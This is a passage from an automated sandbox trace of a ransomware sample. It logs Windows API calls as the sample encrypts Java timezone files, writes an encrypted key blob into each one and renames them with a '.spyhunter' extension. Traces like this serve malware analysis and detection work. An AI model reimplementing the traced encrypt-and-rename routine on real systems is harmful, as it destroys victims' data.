pbBuffer=0x25ce548) returned 1 [0168.786] GetProcessHeap () returned 0x2c0000 [0168.786] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f110 [0168.786] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f110*, pdwDataLen=0x25ce540*=0x20, dwBufLen=0x30 | out: pbData=0x31f110*, pdwDataLen=0x25ce540*=0x30) returned 1 [0168.786] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Etc\\GMT-10" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\etc\\gmt-10"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x178 [0168.787] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Etc\\GMT-10") returned 54 [0168.787] StrStrW (lpFirst="GMT-10", lpSrch=".txt") returned 0x0 [0168.787] GetProcessHeap () returned 0x2c0000 [0168.787] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c375d8 [0168.787] ReadFile (in: hFile=0x178, lpBuffer=0x2c375d8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x25ce504, lpOverlapped=0x0 | out: lpBuffer=0x2c375d8*, lpNumberOfBytesRead=0x25ce504*=0x1b, lpOverlapped=0x0) returned 1 [0168.788] SetFilePointerEx (in: hFile=0x178, liDistanceToMove=0xffffffe5, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0168.788] WriteFile (in: hFile=0x178, lpBuffer=0x2c375d8*, nNumberOfBytesToWrite=0x1b, lpNumberOfBytesWritten=0x25ce504, lpOverlapped=0x0 | out: lpBuffer=0x2c375d8*, lpNumberOfBytesWritten=0x25ce504*=0x1b, lpOverlapped=0x0) returned 1 [0168.788] GetProcessHeap () returned 0x2c0000 [0168.788] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c375d8 | out: hHeap=0x2c0000) returned 1 [0168.788] SetFilePointerEx (in: hFile=0x178, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0168.788] WriteFile (in: hFile=0x178, lpBuffer=0x25ce544*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x25ce504, lpOverlapped=0x0 | out: lpBuffer=0x25ce544*, lpNumberOfBytesWritten=0x25ce504*=0x4, lpOverlapped=0x0) returned 1 [0168.788] WriteFile (in: hFile=0x178, lpBuffer=0x31f110*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x25ce504, lpOverlapped=0x0 | out: lpBuffer=0x31f110*, lpNumberOfBytesWritten=0x25ce504*=0x30, lpOverlapped=0x0) returned 1 [0168.788] CloseHandle (hObject=0x178) returned 1 [0168.788] GetProcessHeap () returned 0x2c0000 [0168.788] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2df1668 [0168.788] wnsprintfW (in: pszDest=0x2df1668, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Etc\\GMT-10.spyhunter") returned 64 [0168.789] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Etc\\GMT-10" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\etc\\gmt-10"), lpNewFileName="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Etc\\GMT-10.spyhunter" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\etc\\gmt-10.spyhunter")) returned 1 [0168.789] GetProcessHeap () returned 0x2c0000 [0168.789] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2df1668 | out: hHeap=0x2c0000) returned 1 [0168.789] GetProcessHeap () returned 0x2c0000 [0168.789] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f110 | out: hHeap=0x2c0000) returned 1 [0168.789] GetProcessHeap () returned 0x2c0000 [0168.789] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ed3650 | out: hHeap=0x2c0000) returned 1 [0168.789] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x25ce548 | out: pbBuffer=0x25ce548) returned 1 [0168.789] GetProcessHeap () returned 0x2c0000 [0168.790] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f110 [0168.790] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f110*, pdwDataLen=0x25ce540*=0x20, dwBufLen=0x30 | out: pbData=0x31f110*, pdwDataLen=0x25ce540*=0x30) returned 1 [0168.790] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Etc\\GMT-1" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\etc\\gmt-1"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xb0 [0168.793] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Etc\\GMT-1") returned 53 [0168.793] StrStrW (lpFirst="GMT-1", lpSrch=".txt") returned 0x0 [0168.793] GetProcessHeap () returned 0x2c0000 [0168.793] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c34bd0 [0168.793] ReadFile (in: hFile=0xb0, lpBuffer=0x2c34bd0, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x25ce504, lpOverlapped=0x0 | out: lpBuffer=0x2c34bd0*, lpNumberOfBytesRead=0x25ce504*=0x1b, lpOverlapped=0x0) returned 1 [0168.794] SetFilePointerEx (in: hFile=0xb0, liDistanceToMove=0xffffffe5, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0168.794] WriteFile (in: hFile=0xb0, lpBuffer=0x2c34bd0*, nNumberOfBytesToWrite=0x1b, lpNumberOfBytesWritten=0x25ce504, lpOverlapped=0x0 | out: lpBuffer=0x2c34bd0*, lpNumberOfBytesWritten=0x25ce504*=0x1b, lpOverlapped=0x0) returned 1 [0168.794] GetProcessHeap () returned 0x2c0000 [0168.794] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c34bd0 | out: hHeap=0x2c0000) returned 1 [0168.794] SetFilePointerEx (in: hFile=0xb0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0168.794] WriteFile (in: hFile=0xb0, lpBuffer=0x25ce544*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x25ce504, lpOverlapped=0x0 | out: lpBuffer=0x25ce544*, lpNumberOfBytesWritten=0x25ce504*=0x4, lpOverlapped=0x0) returned 1 [0168.794] WriteFile (in: hFile=0xb0, lpBuffer=0x31f110*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x25ce504, lpOverlapped=0x0 | out: lpBuffer=0x31f110*, lpNumberOfBytesWritten=0x25ce504*=0x30, lpOverlapped=0x0) returned 1 [0168.794] CloseHandle (hObject=0xb0) returned 1 [0168.794] GetProcessHeap () returned 0x2c0000 [0168.794] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2df1668 [0168.794] wnsprintfW (in: pszDest=0x2df1668, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Etc\\GMT-1.spyhunter") returned 63 [0168.794] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Etc\\GMT-1" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\etc\\gmt-1"), lpNewFileName="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Etc\\GMT-1.spyhunter" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\etc\\gmt-1.spyhunter")) returned 1 [0168.795] GetProcessHeap () returned 0x2c0000 [0168.795] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2df1668 | out: hHeap=0x2c0000) returned 1 [0168.795] GetProcessHeap () returned 0x2c0000 [0168.795] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f110 | out: hHeap=0x2c0000) returned 1 [0168.795] GetProcessHeap () returned 0x2c0000 [0168.795] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f28620 | out: hHeap=0x2c0000) returned 1 [0168.795] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x25ce540 | out: pbBuffer=0x25ce540) returned 1 [0168.795] GetProcessHeap () returned 0x2c0000 [0168.795] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f110 [0168.795] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f110*, pdwDataLen=0x25ce538*=0x20, dwBufLen=0x30 | out: pbData=0x31f110*, pdwDataLen=0x25ce538*=0x30) returned 1 [0168.796] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Etc\\GMT+8" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\etc\\gmt+8"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xb0 [0168.796] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Etc\\GMT+8") returned 53 [0168.796] StrStrW (lpFirst="GMT+8", lpSrch=".txt") returned 0x0 [0168.796] GetProcessHeap () returned 0x2c0000 [0168.796] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c34bd0 [0168.796] ReadFile (in: hFile=0xb0, lpBuffer=0x2c34bd0, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x25ce4fc, lpOverlapped=0x0 | out: lpBuffer=0x2c34bd0*, lpNumberOfBytesRead=0x25ce4fc*=0x1b, lpOverlapped=0x0) returned 1 [0168.797] SetFilePointerEx (in: hFile=0xb0, liDistanceToMove=0xffffffe5, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0168.797] WriteFile (in: hFile=0xb0, lpBuffer=0x2c34bd0*, nNumberOfBytesToWrite=0x1b, lpNumberOfBytesWritten=0x25ce4fc, lpOverlapped=0x0 | out: lpBuffer=0x2c34bd0*, lpNumberOfBytesWritten=0x25ce4fc*=0x1b, lpOverlapped=0x0) returned 1 [0168.797] GetProcessHeap () returned 0x2c0000 [0168.797] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c34bd0 | out: hHeap=0x2c0000) returned 1 [0168.797] SetFilePointerEx (in: hFile=0xb0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0168.797] WriteFile (in: hFile=0xb0, lpBuffer=0x25ce53c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x25ce4fc, lpOverlapped=0x0 | out: lpBuffer=0x25ce53c*, lpNumberOfBytesWritten=0x25ce4fc*=0x4, lpOverlapped=0x0) returned 1 [0168.797] WriteFile (in: hFile=0xb0, lpBuffer=0x31f110*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x25ce4fc, lpOverlapped=0x0 | out: lpBuffer=0x31f110*, lpNumberOfBytesWritten=0x25ce4fc*=0x30, lpOverlapped=0x0) returned 1 [0168.797] CloseHandle (hObject=0xb0) returned 1 [0168.797] GetProcessHeap () returned 0x2c0000 [0168.797] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2df1668 [0168.798] wnsprintfW (in: pszDest=0x2df1668, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Etc\\GMT+8.spyhunter") returned 63 [0168.798] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Etc\\GMT+8" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\etc\\gmt+8"), lpNewFileName="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Etc\\GMT+8.spyhunter" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\etc\\gmt+8.spyhunter")) returned 1 [0168.798] GetProcessHeap () returned 0x2c0000 [0168.798] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2df1668 | out: hHeap=0x2c0000) returned 1 [0168.798] GetProcessHeap () returned 0x2c0000 [0168.798] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f110 | out: hHeap=0x2c0000) returned 1 [0168.798] GetProcessHeap () returned 0x2c0000 [0168.798] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f284b0 | out: hHeap=0x2c0000) returned 1 [0168.798] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x25ce540 | out: pbBuffer=0x25ce540) returned 1 [0168.798] GetProcessHeap () returned 0x2c0000 [0168.798] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f110 [0168.799] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f110*, pdwDataLen=0x25ce538*=0x20, dwBufLen=0x30 | out: pbData=0x31f110*, pdwDataLen=0x25ce538*=0x30) returned 1 [0168.799] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Etc\\GMT+7" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\etc\\gmt+7"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xb0 [0168.799] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Etc\\GMT+7") returned 53 [0168.799] StrStrW (lpFirst="GMT+7", lpSrch=".txt") returned 0x0 [0168.799] GetProcessHeap () returned 0x2c0000 [0168.799] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c34bd0 [0168.799] ReadFile (in: hFile=0xb0, lpBuffer=0x2c34bd0, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x25ce4fc, lpOverlapped=0x0 | out: lpBuffer=0x2c34bd0*, lpNumberOfBytesRead=0x25ce4fc*=0x1b, lpOverlapped=0x0) returned 1 [0168.800] SetFilePointerEx (in: hFile=0xb0, liDistanceToMove=0xffffffe5, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0168.800] WriteFile (in: hFile=0xb0, lpBuffer=0x2c34bd0*, nNumberOfBytesToWrite=0x1b, lpNumberOfBytesWritten=0x25ce4fc, lpOverlapped=0x0 | out: lpBuffer=0x2c34bd0*, lpNumberOfBytesWritten=0x25ce4fc*=0x1b, lpOverlapped=0x0) returned 1 [0168.800] GetProcessHeap () returned 0x2c0000 [0168.800] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c34bd0 | out: hHeap=0x2c0000) returned 1 [0168.800] SetFilePointerEx (in: hFile=0xb0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0168.800] WriteFile (in: hFile=0xb0, lpBuffer=0x25ce53c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x25ce4fc, lpOverlapped=0x0 | out: lpBuffer=0x25ce53c*, lpNumberOfBytesWritten=0x25ce4fc*=0x4, lpOverlapped=0x0) returned 1 [0168.800] WriteFile (in: hFile=0xb0, lpBuffer=0x31f110*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x25ce4fc, lpOverlapped=0x0 | out: lpBuffer=0x31f110*, lpNumberOfBytesWritten=0x25ce4fc*=0x30, lpOverlapped=0x0) returned 1 [0168.800] CloseHandle (hObject=0xb0) returned 1 [0168.800] GetProcessHeap () returned 0x2c0000 [0168.801] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2df1668 [0168.801] wnsprintfW (in: pszDest=0x2df1668, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Etc\\GMT+7.spyhunter") returned 63 [0168.801] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Etc\\GMT+7" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\etc\\gmt+7"), lpNewFileName="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Etc\\GMT+7.spyhunter" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\etc\\gmt+7.spyhunter")) returned 1 [0168.801] GetProcessHeap () returned 0x2c0000 [0168.801] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2df1668 | out: hHeap=0x2c0000) returned 1 [0168.801] GetProcessHeap () returned 0x2c0000 [0168.801] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f110 | out: hHeap=0x2c0000) returned 1 [0168.801] GetProcessHeap () returned 0x2c0000 [0168.801] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f283f8 | out: hHeap=0x2c0000) returned 1 [0168.801] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x25ce538 | out: pbBuffer=0x25ce538) returned 1 [0168.801] GetProcessHeap () returned 0x2c0000 [0168.801] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f110 [0168.802] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f110*, pdwDataLen=0x25ce530*=0x20, dwBufLen=0x30 | out: pbData=0x31f110*, pdwDataLen=0x25ce530*=0x30) returned 1 [0168.802] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Etc\\GMT+6" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\etc\\gmt+6"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xb0 [0168.802] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Etc\\GMT+6") returned 53 [0168.802] StrStrW (lpFirst="GMT+6", lpSrch=".txt") returned 0x0 [0168.802] GetProcessHeap () returned 0x2c0000 [0168.802] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c34bd0 [0168.802] ReadFile (in: hFile=0xb0, lpBuffer=0x2c34bd0, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x25ce4f4, lpOverlapped=0x0 | out: lpBuffer=0x2c34bd0*, lpNumberOfBytesRead=0x25ce4f4*=0x1b, lpOverlapped=0x0) returned 1 [0168.803] SetFilePointerEx (in: hFile=0xb0, liDistanceToMove=0xffffffe5, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0168.803] WriteFile (in: hFile=0xb0, lpBuffer=0x2c34bd0*, nNumberOfBytesToWrite=0x1b, lpNumberOfBytesWritten=0x25ce4f4, lpOverlapped=0x0 | out: lpBuffer=0x2c34bd0*, lpNumberOfBytesWritten=0x25ce4f4*=0x1b, lpOverlapped=0x0) returned 1 [0168.803] GetProcessHeap () returned 0x2c0000 [0168.803] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c34bd0 | out: hHeap=0x2c0000) returned 1 [0168.803] SetFilePointerEx (in: hFile=0xb0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0168.803] WriteFile (in: hFile=0xb0, lpBuffer=0x25ce534*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x25ce4f4, lpOverlapped=0x0 | out: lpBuffer=0x25ce534*, lpNumberOfBytesWritten=0x25ce4f4*=0x4, lpOverlapped=0x0) returned 1 [0168.803] WriteFile (in: hFile=0xb0, lpBuffer=0x31f110*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x25ce4f4, lpOverlapped=0x0 | out: lpBuffer=0x31f110*, lpNumberOfBytesWritten=0x25ce4f4*=0x30, lpOverlapped=0x0) returned 1 [0168.803] CloseHandle (hObject=0xb0) returned 1 [0168.803] GetProcessHeap () returned 0x2c0000 [0168.803] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2df1668 [0168.803] wnsprintfW (in: pszDest=0x2df1668, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Etc\\GMT+6.spyhunter") returned 63 [0168.804] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Etc\\GMT+6" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\etc\\gmt+6"), lpNewFileName="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Etc\\GMT+6.spyhunter" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\etc\\gmt+6.spyhunter")) returned 1 [0168.804] GetProcessHeap () returned 0x2c0000 [0168.804] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2df1668 | out: hHeap=0x2c0000) returned 1 [0168.804] GetProcessHeap () returned 0x2c0000 [0168.804] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f110 | out: hHeap=0x2c0000) returned 1 [0168.804] GetProcessHeap () returned 0x2c0000 [0168.804] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f28340 | out: hHeap=0x2c0000) returned 1 [0168.804] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x25ce538 | out: pbBuffer=0x25ce538) returned 1 [0168.804] GetProcessHeap () returned 0x2c0000 [0168.804] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f110 [0168.804] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f110*, pdwDataLen=0x25ce530*=0x20, dwBufLen=0x30 | out: pbData=0x31f110*, pdwDataLen=0x25ce530*=0x30) returned 1 [0168.805] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Etc\\GMT+5" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\etc\\gmt+5"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xb0 [0168.805] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Etc\\GMT+5") returned 53 [0168.805] StrStrW (lpFirst="GMT+5", lpSrch=".txt") returned 0x0 [0168.805] GetProcessHeap () returned 0x2c0000 [0168.805] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c34bd0 [0168.805] ReadFile (in: hFile=0xb0, lpBuffer=0x2c34bd0, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x25ce4f4, lpOverlapped=0x0 | out: lpBuffer=0x2c34bd0*, lpNumberOfBytesRead=0x25ce4f4*=0x1b, lpOverlapped=0x0) returned 1 [0168.806] SetFilePointerEx (in: hFile=0xb0, liDistanceToMove=0xffffffe5, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0168.806] WriteFile (in: hFile=0xb0, lpBuffer=0x2c34bd0*, nNumberOfBytesToWrite=0x1b, lpNumberOfBytesWritten=0x25ce4f4, lpOverlapped=0x0 | out: lpBuffer=0x2c34bd0*, lpNumberOfBytesWritten=0x25ce4f4*=0x1b, lpOverlapped=0x0) returned 1 [0168.806] GetProcessHeap () returned 0x2c0000 [0168.806] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c34bd0 | out: hHeap=0x2c0000) returned 1 [0168.806] SetFilePointerEx (in: hFile=0xb0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0168.806] WriteFile (in: hFile=0xb0, lpBuffer=0x25ce534*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x25ce4f4, lpOverlapped=0x0 | out: lpBuffer=0x25ce534*, lpNumberOfBytesWritten=0x25ce4f4*=0x4, lpOverlapped=0x0) returned 1 [0168.806] WriteFile (in: hFile=0xb0, lpBuffer=0x31f110*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x25ce4f4, lpOverlapped=0x0 | out: lpBuffer=0x31f110*, lpNumberOfBytesWritten=0x25ce4f4*=0x30, lpOverlapped=0x0) returned 1 [0168.806] CloseHandle (hObject=0xb0) returned 1 [0168.806] GetProcessHeap () returned 0x2c0000 [0168.806] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2df1668 [0168.807] wnsprintfW (in: pszDest=0x2df1668, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Etc\\GMT+5.spyhunter") returned 63 [0168.807] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Etc\\GMT+5" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\etc\\gmt+5"), lpNewFileName="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Etc\\GMT+5.spyhunter" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\etc\\gmt+5.spyhunter")) returned 1 [0168.807] GetProcessHeap () returned 0x2c0000 [0168.807] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2df1668 | out: hHeap=0x2c0000) returned 1 [0168.807] GetProcessHeap () returned 0x2c0000 [0168.807] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f110 | out: hHeap=0x2c0000) returned 1 [0168.807] GetProcessHeap () returned 0x2c0000 [0168.807] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f28288 | out: hHeap=0x2c0000) returned 1 [0168.807] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x25ce530 | out: pbBuffer=0x25ce530) returned 1 [0168.807] GetProcessHeap () returned 0x2c0000 [0168.807] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f110 [0168.807] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f110*, pdwDataLen=0x25ce528*=0x20, dwBufLen=0x30 | out: pbData=0x31f110*, pdwDataLen=0x25ce528*=0x30) returned 1 [0168.808] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Etc\\GMT+4" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\etc\\gmt+4"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xb0 [0168.808] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Etc\\GMT+4") returned 53 [0168.808] StrStrW (lpFirst="GMT+4", lpSrch=".txt") returned 0x0 [0168.808] GetProcessHeap () returned 0x2c0000 [0168.808] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c34bd0 [0168.809] ReadFile (in: hFile=0xb0, lpBuffer=0x2c34bd0, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x25ce4ec, lpOverlapped=0x0 | out: lpBuffer=0x2c34bd0*, lpNumberOfBytesRead=0x25ce4ec*=0x1b, lpOverlapped=0x0) returned 1 [0168.809] SetFilePointerEx (in: hFile=0xb0, liDistanceToMove=0xffffffe5, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0168.809] WriteFile (in: hFile=0xb0, lpBuffer=0x2c34bd0*, nNumberOfBytesToWrite=0x1b, lpNumberOfBytesWritten=0x25ce4ec, lpOverlapped=0x0 | out: lpBuffer=0x2c34bd0*, lpNumberOfBytesWritten=0x25ce4ec*=0x1b, 